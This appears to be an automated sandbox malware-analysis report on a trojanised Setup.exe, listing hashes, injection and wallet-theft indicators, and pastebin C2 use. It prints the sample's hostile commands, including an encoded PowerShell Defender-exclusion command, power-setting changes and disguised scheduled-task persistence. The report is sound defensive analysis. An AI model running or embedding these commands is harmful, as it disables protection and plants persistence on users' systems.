Overview
overview
10Static
static
10Setup.exe
windows7-x64
1Setup.exe
windows10-2004-x64
8msvcp290.dll
windows7-x64
1msvcp290.dll
windows10-2004-x64
1nasrallah_x86.dll
windows7-x64
1nasrallah_x86.dll
windows10-2004-x64
1tier0_s64.dll
windows7-x64
1tier0_s64.dll
windows10-2004-x64
1vcruntime210.dll
windows7-x64
1vcruntime210.dll
windows10-2004-x64
1vstdlib_s64.dll
windows7-x64
1vstdlib_s64.dll
windows10-2004-x64
10Analysis
-
max time kernel
103s -
max time network
114s -
platform
windows10-2004_x64 -
resource
win10v2004-20250314-en -
resource tags
arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system -
submitted
21/03/2025, 01:05
Behavioral task
behavioral1
Sample
Setup.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
Setup.exe
Resource
win10v2004-20250314-en
Behavioral task
behavioral3
Sample
msvcp290.dll
Resource
win7-20240903-en
Behavioral task
behavioral4
Sample
msvcp290.dll
Resource
win10v2004-20250314-en
Behavioral task
behavioral5
Sample
nasrallah_x86.dll
Resource
win7-20240903-en
Behavioral task
behavioral6
Sample
nasrallah_x86.dll
Resource
win10v2004-20250314-en
Behavioral task
behavioral7
Sample
tier0_s64.dll
Resource
win7-20241023-en
Behavioral task
behavioral8
Sample
tier0_s64.dll
Resource
win10v2004-20250314-en
Behavioral task
behavioral9
Sample
vcruntime210.dll
Resource
win7-20241010-en
Behavioral task
behavioral10
Sample
vcruntime210.dll
Resource
win10v2004-20250314-en
Behavioral task
behavioral11
Sample
vstdlib_s64.dll
Resource
win7-20240903-en
Behavioral task
behavioral12
Sample
vstdlib_s64.dll
Resource
win10v2004-20250314-en
General
-
Target
Setup.exe
-
Size
759KB
-
MD5
241e1f1358add031fb9fd18c2a0082b3
-
SHA1
9f7b9614ed2a3622249df6e7c702168b8b6aa02c
-
SHA256
129e0c2fa47bb97251800a4cf13f235f38fbe71aa6c98131e7cd85b433dc3204
-
SHA512
fa06623308b65e6aaa4d137cda9e9126170c378f1f4709b3430eb839c8a408b2bb367b52eb3800f542d04444796f53f5f06711907a440daceaa7d0fa157aaa5c
-
SSDEEP
12288:vJwFlRKCVTrpBdHY2ebSlZO19bjYN47/oUxFuVIZNZ3qLvxX363910TbwIjq9N:vURrRYJbSlj4oUxIGZNZ3avZKtqXe
Malware Config
Signatures
-
Downloads MZ/PE file 3 IoCs
flow pid Process 31 1608 0ZZU09VTUJ7RAMG058NAQVAG8.exe 27 3436 MSBuild.exe 32 1608 0ZZU09VTUJ7RAMG058NAQVAG8.exe -
Executes dropped EXE 1 IoCs
pid Process 1608 0ZZU09VTUJ7RAMG058NAQVAG8.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 29 pastebin.com 30 pastebin.com -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Power Settings 1 TTPs 1 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
pid Process 4900 cmd.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 5096 set thread context of 3436 5096 Setup.exe 87 -
System Location Discovery: System Language Discovery 1 TTPs 8 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 0ZZU09VTUJ7RAMG058NAQVAG8.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3712 schtasks.exe 2220 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 13 IoCs
pid Process 3436 MSBuild.exe 3436 MSBuild.exe 3436 MSBuild.exe 3436 MSBuild.exe 3436 MSBuild.exe 3436 MSBuild.exe 1608 0ZZU09VTUJ7RAMG058NAQVAG8.exe 2500 powershell.exe 2500 powershell.exe 1608 0ZZU09VTUJ7RAMG058NAQVAG8.exe 1608 0ZZU09VTUJ7RAMG058NAQVAG8.exe 1608 0ZZU09VTUJ7RAMG058NAQVAG8.exe 1608 0ZZU09VTUJ7RAMG058NAQVAG8.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeImpersonatePrivilege 3436 MSBuild.exe Token: SeDebugPrivilege 1608 0ZZU09VTUJ7RAMG058NAQVAG8.exe Token: SeDebugPrivilege 2500 powershell.exe -
Suspicious use of WriteProcessMemory 30 IoCs
description pid Process procid_target PID 5096 wrote to memory of 3436 5096 Setup.exe 87 PID 5096 wrote to memory of 3436 5096 Setup.exe 87 PID 5096 wrote to memory of 3436 5096 Setup.exe 87 PID 5096 wrote to memory of 3436 5096 Setup.exe 87 PID 5096 wrote to memory of 3436 5096 Setup.exe 87 PID 5096 wrote to memory of 3436 5096 Setup.exe 87 PID 5096 wrote to memory of 3436 5096 Setup.exe 87 PID 5096 wrote to memory of 3436 5096 Setup.exe 87 PID 5096 wrote to memory of 3436 5096 Setup.exe 87 PID 3436 wrote to memory of 1608 3436 MSBuild.exe 91 PID 3436 wrote to memory of 1608 3436 MSBuild.exe 91 PID 3436 wrote to memory of 1608 3436 MSBuild.exe 91 PID 1608 wrote to memory of 4900 1608 0ZZU09VTUJ7RAMG058NAQVAG8.exe 92 PID 1608 wrote to memory of 4900 1608 0ZZU09VTUJ7RAMG058NAQVAG8.exe 92 PID 1608 wrote to memory of 4900 1608 0ZZU09VTUJ7RAMG058NAQVAG8.exe 92 PID 4900 wrote to memory of 2500 4900 cmd.exe 94 PID 4900 wrote to memory of 2500 4900 cmd.exe 94 PID 4900 wrote to memory of 2500 4900 cmd.exe 94 PID 1608 wrote to memory of 1696 1608 0ZZU09VTUJ7RAMG058NAQVAG8.exe 95 PID 1608 wrote to memory of 1696 1608 0ZZU09VTUJ7RAMG058NAQVAG8.exe 95 PID 1608 wrote to memory of 1696 1608 0ZZU09VTUJ7RAMG058NAQVAG8.exe 95 PID 1608 wrote to memory of 4320 1608 0ZZU09VTUJ7RAMG058NAQVAG8.exe 96 PID 1608 wrote to memory of 4320 1608 0ZZU09VTUJ7RAMG058NAQVAG8.exe 96 PID 1608 wrote to memory of 4320 1608 0ZZU09VTUJ7RAMG058NAQVAG8.exe 96 PID 4320 wrote to memory of 3712 4320 cmd.exe 99 PID 4320 wrote to memory of 3712 4320 cmd.exe 99 PID 4320 wrote to memory of 3712 4320 cmd.exe 99 PID 1696 wrote to memory of 2220 1696 cmd.exe 100 PID 1696 wrote to memory of 2220 1696 cmd.exe 100 PID 1696 wrote to memory of 2220 1696 cmd.exe 100
Processes
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:5096 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"2⤵
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3436 -
C:\Users\Admin\AppData\Local\Temp\0ZZU09VTUJ7RAMG058NAQVAG8.exe"C:\Users\Admin\AppData\Local\Temp\0ZZU09VTUJ7RAMG058NAQVAG8.exe"3⤵
- Downloads MZ/PE file
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1608 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C powershell -EncodedCommand "PAAjAHkAbwBKACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAeQAxAFcAcAB2ADMAdABvAHEAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAVQBuAEsAYQBmAHYANwB1ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjADgAdgBhAGIAIwA+AA==" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off4⤵
- Power Settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4900 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "PAAjAHkAbwBKACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAeQAxAFcAcAB2ADMAdABvAHEAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAVQBuAEsAYQBmAHYANwB1ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjADgAdgBhAGIAIwA+AA=="5⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2500
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1696 -
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"5⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2220
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk3214" /TR "C:\ProgramData\Dllhost\dllhost.exe"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4320 -
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk3214" /TR "C:\ProgramData\Dllhost\dllhost.exe"5⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:3712
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
21KB
MD5c11a82d699a06d9b8ba4296e0c562ae4
SHA1e91963fe8def3ed151333a6a66d005237600ba30
SHA256483b1d7dac70de82e9b22a0c1ed775cf7e10b0a3790c5aa1b9215dbcd1754302
SHA512cc8644279ea2cebf70f594f6cc48d6ebbc10d036b7dcf1008fc05565da85cc36f7e8af7faa49b7c117c9a6ac94d7c007a99b53ec1dd668a7f8c28dc25b410a54
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82